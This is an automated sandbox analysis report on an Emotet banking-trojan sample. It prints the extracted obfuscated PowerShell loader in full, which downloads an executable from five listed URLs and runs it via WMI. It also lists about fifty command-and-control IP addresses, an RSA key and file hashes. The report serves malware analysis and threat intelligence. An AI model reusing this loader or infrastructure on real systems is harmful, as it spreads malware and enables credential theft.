SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313

General

Target: SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313
Completed: 01-08-2020 19:52
Sample: 200801-aht4rn3ree
SHA256: dc875f711c036d142c516a749754c9752e410f28c3a2223de920488093754e0b
Score: 10/10
Malware Config

Extracted

Language: ps1
Source: $TUOOFjjd='JEOUSdek';[Net.ServicePointManager]::"S`ECURityP`RoToCOl" = 'tls12, tls11, tls';$CUZQZtya = '285';$NIBCCosv='JOFKHpto';$GGMBQbyi=$env:userprofile+'\'+$CUZQZtya+'.exe';$SBCSMfod='IBVLOmpn';$NWDGLxro=.('new'+'-obj'+'ect') Net.WEbclIEnT;$OZDAKgvp='http://rectificadoscarrion.com/wp-includes/EiQ/*http://renekok.com/QbWyat/*http://www.onlinemediadesigns.com/bin/nObh/*http://renegaderadio.net/haunted/cA5zuC5/*http://qatifsport.net/t/NbQq254/'."sp`lIt"([char]42);$SSMANocu='DTGFZpas';foreach($ZNZIIini in $OZDAKgvp){try{$NWDGLxro."DOwn`l`O`AdfIle"($ZNZIIini, $GGMBQbyi);$FVVVNykk='KXATUueb';If ((&('G'+'et-Ite'+'m') $GGMBQbyi)."lE`NgTH" -ge 36957) {([wmiclass]'win32_Process')."CR`ea`TE"($GGMBQbyi);$SNOQSykj='CCGLVgks';break;$WEOPDvrx='KYMAXtja'}}catch{}}$QFDWDonh='EMENKbqf'
URLs

exe.dropper: http://rectificadoscarrion.com/wp-includes/EiQ/
exe.dropper: http://renekok.com/QbWyat/
exe.dropper: http://www.onlinemediadesigns.com/bin/nObh/
exe.dropper: http://renegaderadio.net/haunted/cA5zuC5/
exe.dropper: http://qatifsport.net/t/NbQq254/

Related Tasks: behavioral1, behavioral2

Extracted

Family: emotet

C2:
73.116.193.136:80
185.94.252.13:443
149.62.173.247:8080
89.32.150.160:8080
185.94.252.12:80
77.90.136.129:8080
83.169.21.32:7080
104.236.161.64:8080
114.109.179.60:80
189.2.177.210:443
68.183.190.199:8080
144.139.91.187:443
185.94.252.27:443
190.181.235.46:80
82.196.15.205:8080
46.28.111.142:7080
181.167.96.215:80
202.62.39.111:80
219.92.13.25:80
191.99.160.58:80
50.28.51.143:8080
172.104.169.32:8080
192.241.146.84:8080
82.240.207.95:443
80.249.176.206:80
2.47.112.152:80
212.231.60.98:80
77.55.211.77:8080
170.81.48.2:80
5.196.35.138:7080
143.0.87.101:80
190.6.193.152:8080
217.199.160.224:7080
187.162.248.237:80
93.151.186.85:80
177.74.228.34:80
204.225.249.100:7080
217.13.106.14:8080
51.255.165.160:8080
104.131.103.37:8080
177.72.13.80:80
190.163.31.26:80
186.70.127.199:8090
61.92.159.208:8080
12.162.84.2:8080
71.50.31.38:80
186.250.52.226:8080
92.23.34.86:80
177.144.135.2:80
201.213.156.176:80

rsa_pubkey.plain:
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6
uS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz
6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB
-----END PUBLIC KEY-----

Related Tasks: behavioral1, behavioral2
Targets

Target: SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313
MD5: a218719fd104a4c006280fed89268170
Filesize: 168KB
Score: 10/10
SHA1: 4a14ff4ab8445b69e5ad1960236a0c4c4b583d6e
SHA256: dc875f711c036d142c516a749754c9752e410f28c3a2223de920488093754e0b
SHA512: 99b11414943e18e955451b3f7058564b88e4abb5baa79975a98dd4471826de49cb714854a32c6ca54794229e0712a0b387fb59cd98085ee3b51a25f19c04d041
Tags: trojan, banker, emotet
